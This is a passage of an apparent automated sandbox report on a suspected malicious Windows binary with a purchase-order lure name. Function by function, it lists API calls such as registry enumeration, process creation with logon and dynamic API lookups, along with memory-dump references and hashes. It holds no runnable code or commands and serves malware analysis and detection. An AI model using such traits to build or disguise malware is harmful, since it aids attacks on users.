                        Function 0031A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0031A13B
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0031A148
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0031A153
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0031A162
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0031A16E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: 04e267fba7a0dde0647260fec6f46feebdd2555828685def54fe4b94d623dd3e
                        • Instruction ID: 043040eb73cbc657b3caefa25be3bd22829e9dafc52de14e75e48125d7fa6de4
                        • Opcode Fuzzy Hash: 04e267fba7a0dde0647260fec6f46feebdd2555828685def54fe4b94d623dd3e
                        • Instruction Fuzzy Hash: 9F11E2B2140219BEEF164F60CC86EE77F5DEF0C398F014225FA08A6090C6729C61DBA0
                        Function 0031E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0031E14D
                        • _memset.LIBCMT ref: 0031E15C
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00373EE0,00373F24), ref: 0031E18B
                        • CloseHandle.KERNEL32 ref: 0031E19D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
                        • String ID: $?7$>7
                        • API String ID: 3277943733-1332447199
                        • Opcode ID: 66c3f27c4ec989d11fcc964a6528d156a9357df51c4ba40b6342318c5bdd3f1e
                        • Instruction ID: a04e3de1a3ec06def46099f8614424ec74d49f63ef6723390b87fb29816b150f
                        • Opcode Fuzzy Hash: 66c3f27c4ec989d11fcc964a6528d156a9357df51c4ba40b6342318c5bdd3f1e
                        • Instruction Fuzzy Hash: B5F089F1940314BFF2226B65AC55FB77A6CDB09394F004421FE0CD5192D3B64E5096A5
                        Function 002CC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?,?), ref: 002CC6C0
                        • GetWindowRect.USER32(?,?), ref: 002CC701
                        • ScreenToClient.USER32(?,?), ref: 002CC729
                        • GetClientRect.USER32(?,?), ref: 002CC856
                        • GetWindowRect.USER32(?,?), ref: 002CC86F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$Screen
                        • String ID:
                        • API String ID: 1296646539-0
                        • Opcode ID: 998848d8443227aabbb31a5cd69e68ecaf02cff5c6e63d575f1d3d739b214dd2
                        • Instruction ID: 0e6f4c22896fb3f3db87a0d5651d9dd32e1d161a80bcdae685cee03f913c6e3a
                        • Opcode Fuzzy Hash: 998848d8443227aabbb31a5cd69e68ecaf02cff5c6e63d575f1d3d739b214dd2
                        • Instruction Fuzzy Hash: E8B15D7991024ADBDF11CFA8C580BEEB7B1FF08310F259229EC59EB254DB70A950CB64
                        Function 002F9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        • Opcode ID: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                        • Instruction ID: a72a2462f43897640740c088d78ad8045d5c21f21761778c9569e04ebd8f1ec3
                        • Opcode Fuzzy Hash: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                        • Instruction Fuzzy Hash: 65618D3052020E9BCB01EF64CD81FFEB7A9AF45384F044569F95A6B292DA349965CF50
                        Function 00312EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312FA0
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00312FE0
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00313003
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0031302C
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0031306F
                        • RegCloseKey.ADVAPI32(00000000), ref: 0031307C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        • Opcode ID: 414ccb607bd4f54c08216f1e6b3ec3baa48620581524335d42d4aac89818518c
                        • Instruction ID: 3ab68fe0cc9ebd3a16bd2b0ab7a82d8b762c928722bcff23ed2186082ea81fec
                        • Opcode Fuzzy Hash: 414ccb607bd4f54c08216f1e6b3ec3baa48620581524335d42d4aac89818518c
                        • Instruction Fuzzy Hash: 97517B31118204AFC705EF64C881EABBBE9FF88744F04491DF5868B2A1DB71EA65CF52
                        Function 002CDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$_wcscat
                        • String ID:
                        • API String ID: 2037614760-0
                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                        • Instruction ID: cfd97e5faac411dfd26676d1a792207e6e36a766f29c1d7acbcc344090457852
                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                        • Instruction Fuzzy Hash: EB51E131920126AACB11AF98D481EFDB3B0EF04710F50426FF541AB296DBB45F62DB94
                        Function 002F2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 002F2AF6
                        • VariantClear.OLEAUT32(00000013), ref: 002F2B68
                        • VariantClear.OLEAUT32(00000000), ref: 002F2BC3
                        • _memmove.LIBCMT ref: 002F2BED
                        • VariantClear.OLEAUT32(?), ref: 002F2C3A
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002F2C68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        • Opcode ID: d4af208431741d00dc111a8dd924133a55b57e583255a735f076b6829c24859e
                        • Instruction ID: 65a7b74bc7deac0bfdbd9c7d00980c94f2ba4dc62a8181f745967c280ea5b25c
                        • Opcode Fuzzy Hash: d4af208431741d00dc111a8dd924133a55b57e583255a735f076b6829c24859e
                        • Instruction Fuzzy Hash: D4517CB5A10209EFDB14CF58C880AAAB7B8FF4D354F15856AEA49DB310D730E951CFA0
                        Function 003182DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenu.USER32(?), ref: 0031833D
                        • GetMenuItemCount.USER32(00000000), ref: 00318374
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0031839C
                        • GetMenuItemID.USER32(?,?), ref: 0031840B
                        • GetSubMenu.USER32(?,?), ref: 00318419
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0031846A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        • Opcode ID: c7cbe74aef710f7a4062306714268bc50041113814aa398e141de4219388fbce
                        • Instruction ID: b1d7825f842e616cc0673b707bbbc560d25794c3546d1d9e377abf9d5a3e874d
                        • Opcode Fuzzy Hash: c7cbe74aef710f7a4062306714268bc50041113814aa398e141de4219388fbce
                        • Instruction Fuzzy Hash: 9E519E35A00215EFCB06EF65C881AEEB7B8EF48750F154469E915BB351CF30AE418F94
                        Function 002F54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002F552E
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F5579
                        • IsMenu.USER32(00000000), ref: 002F5599
                        • CreatePopupMenu.USER32 ref: 002F55CD
                        • GetMenuItemCount.USER32(000000FF), ref: 002F562B
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002F565C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        • Opcode ID: 7018c37008a5b8b105724827f5c828fdd4b25366460d9dacd7c34ba22749b7e3
                        • Instruction ID: 714da67d2be5a8e200c33e814b4e4147269888ad39912a64cdb96a46d1987cb9
                        • Opcode Fuzzy Hash: 7018c37008a5b8b105724827f5c828fdd4b25366460d9dacd7c34ba22749b7e3
                        • Instruction Fuzzy Hash: 0E51B070620A2E9BDF10CF68D888BBDFBF9AF05394F504129E725DA290D7B09964CB51
                        Function 002CB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 002CB1C1
                        • GetWindowRect.USER32(?,?), ref: 002CB225
                        • ScreenToClient.USER32(?,?), ref: 002CB242
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002CB253
                        • EndPaint.USER32(?,?), ref: 002CB29D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        • Opcode ID: 35e92a411888d76143768d02870cd5f623636392f4e71b38e50df8bfd1d60be3
                        • Instruction ID: e10823d38e8750b258a8c8393d33b47cc891cf72b5484307d94eb7931f8edaab
                        • Opcode Fuzzy Hash: 35e92a411888d76143768d02870cd5f623636392f4e71b38e50df8bfd1d60be3
                        • Instruction Fuzzy Hash: 3E41C171110200AFD722DF28DC85FBA7BF8EB4A320F14066CF9A9872A1C7719855DB62
                        Function 0031E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(00371810,00000000,?,?,00371810,00371810,?,0032E2D6), ref: 0031E21B
                        • EnableWindow.USER32(00000000,00000000), ref: 0031E23F
                        • ShowWindow.USER32(00371810,00000000,?,?,00371810,00371810,?,0032E2D6), ref: 0031E29F
                        • ShowWindow.USER32(00000000,00000004,?,?,00371810,00371810,?,0032E2D6), ref: 0031E2B1
                        • EnableWindow.USER32(00000000,00000001), ref: 0031E2D5
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0031E2F8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 83c3beb63e5416716779f59d78acc9535c2c6103bcfa09f0f6711021487eb4be
                        • Instruction ID: 591040abdb382afc01c4611fc81ee24e781a258b74fc9fd95ffba89e9db17134
                        • Opcode Fuzzy Hash: 83c3beb63e5416716779f59d78acc9535c2c6103bcfa09f0f6711021487eb4be
                        • Instruction Fuzzy Hash: 02416235600140EFDB1BDF54C8A9BD47BE9BB0A304F1945B5FE598F5A2C732A882CB51
                        Function 002EBC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002EBCD9
                        • OpenProcessToken.ADVAPI32(00000000), ref: 002EBCE0
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002EBCEF
                        • CloseHandle.KERNEL32(00000004), ref: 002EBCFA
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002EBD29
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 002EBD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: b6cf2544e68e133507965ab33fdde6d21412e6c3e2b459d8afbac28cf95fb1a8
                        • Instruction ID: 9774d8bc81147b698b095e34bcb4160b7d3d594d91c9f0e0b18136ea81ec4473
                        • Opcode Fuzzy Hash: b6cf2544e68e133507965ab33fdde6d21412e6c3e2b459d8afbac28cf95fb1a8
                        • Instruction Fuzzy Hash: 57217C7215424AAFCF039FA9ED49BEE3BADEF04304F144015FA01A6160C7768D61DB60
                        Function 0031E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB5FA
                          • Part of subcall function 002CB58B: BeginPath.GDI32(?), ref: 002CB611
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB63B
                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0031E9F2
                        • LineTo.GDI32(00000000,00000003,?), ref: 0031EA06
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0031EA14
                        • LineTo.GDI32(00000000,00000000,?), ref: 0031EA24
                        • EndPath.GDI32(00000000), ref: 0031EA34
                        • StrokePath.GDI32(00000000), ref: 0031EA44
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 007edcf79b3fbfd40f08dd358027d63e451d7cafd86835c3d9e984c5138620bb
                        • Instruction ID: c2e2ecd2ab06b5cbc899356b3016512abdc98b07c6d4b1969ba47fcbf908cd52
                        • Opcode Fuzzy Hash: 007edcf79b3fbfd40f08dd358027d63e451d7cafd86835c3d9e984c5138620bb
                        • Instruction Fuzzy Hash: 44110576000149BFEF169F94EC88EEA7FADEF08350F048022FE094A160D7729D95DBA0
                        Function 002EEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 002EEFB6
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 002EEFC7
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002EEFCE
                        • ReleaseDC.USER32(00000000,00000000), ref: 002EEFD6
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002EEFED
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 002EEFFF
                          • Part of subcall function 002EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,002EA79D,00000000,00000000,?,002EAB73), ref: 002EB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDevice$ExceptionRaiseRelease
                        • String ID:
                        • API String ID: 603618608-0
                        • Opcode ID: cf34a7c09be3b085e071159038b31b069e3e4a7dda514634db2fe644171ab4aa
                        • Instruction ID: 19b84f02dfa2fbfa8bb70fbc9e9f41edb50de3a6e6f0813fa81d6f41cc94f492
                        • Opcode Fuzzy Hash: cf34a7c09be3b085e071159038b31b069e3e4a7dda514634db2fe644171ab4aa
                        • Instruction Fuzzy Hash: 9A018475A40345BFEF109BA6AC45B5EBFB8EB48751F004066FA08AB290D6709C10CF61
                        Function 002D87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                        Download Yara Rule
                        APIs
                        • __init_pointers.LIBCMT ref: 002D87D7
                          • Part of subcall function 002D1E5A: __initp_misc_winsig.LIBCMT ref: 002D1E7E
                          • Part of subcall function 002D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002D8BE1
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002D8BF5
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002D8C08
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002D8C1B
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002D8C2E
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002D8C41
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002D8C54
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002D8C67
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002D8C7A
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002D8C8D
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002D8CA0
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002D8CB3
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002D8CC6
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002D8CD9
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002D8CEC
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002D8CFF
                        • __mtinitlocks.LIBCMT ref: 002D87DC
                          • Part of subcall function 002D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0036AC68,00000FA0,?,?,002D87E1,002D6AFA,003667D8,00000014), ref: 002D8AD1
                        • __mtterm.LIBCMT ref: 002D87E5
